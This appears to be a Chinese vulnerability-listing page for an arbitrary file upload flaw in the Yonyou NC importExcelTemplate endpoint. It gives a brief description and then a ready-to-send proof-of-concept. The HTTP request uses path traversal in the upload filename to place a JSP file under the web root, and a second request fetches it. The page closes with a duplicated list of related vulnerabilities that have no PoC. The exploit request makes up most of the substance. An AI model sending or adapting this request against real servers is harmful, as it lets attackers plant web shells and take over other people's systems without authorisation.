用友NC importExcelTemplate 任意文件上传

漏洞描述

用友NC的importExcelTemplate模块存在任意文件上传漏洞。攻击者可通过构造恶意上传请求，绕过文件类型限制，将任意文件上传至服务器。

PoC代码

POST /portal/pt/infopathimport/importExcelTemplate?pageId=login HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNAL3EsrdN90G1hgq

------WebKitFormBoundaryNAL3EsrdN90G1hgq
Content-Disposition: form-data; name="Filedata"; filename="./.\webapps\nc_web\2.jsp"
application/octet-stream

<% out.println("HelloWorld");%>
------WebKitFormBoundaryNAL3EsrdN90G1hgq--


GET /2.jsp HTTP/1.1

漏洞描述

PoC代码

相关漏洞推荐

用友NC IMsgCenterWebService 命令执行漏洞 无POC

用友nc soapRequest.ajax 命令执行漏洞 无POC

用友NC存在 PaWfm2/open SQL注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

用友NC IMsgCenterWebService 命令执行漏洞无POC

用友nc soapRequest.ajax 命令执行漏洞无POC

用友NC存在 PaWfm2/open SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC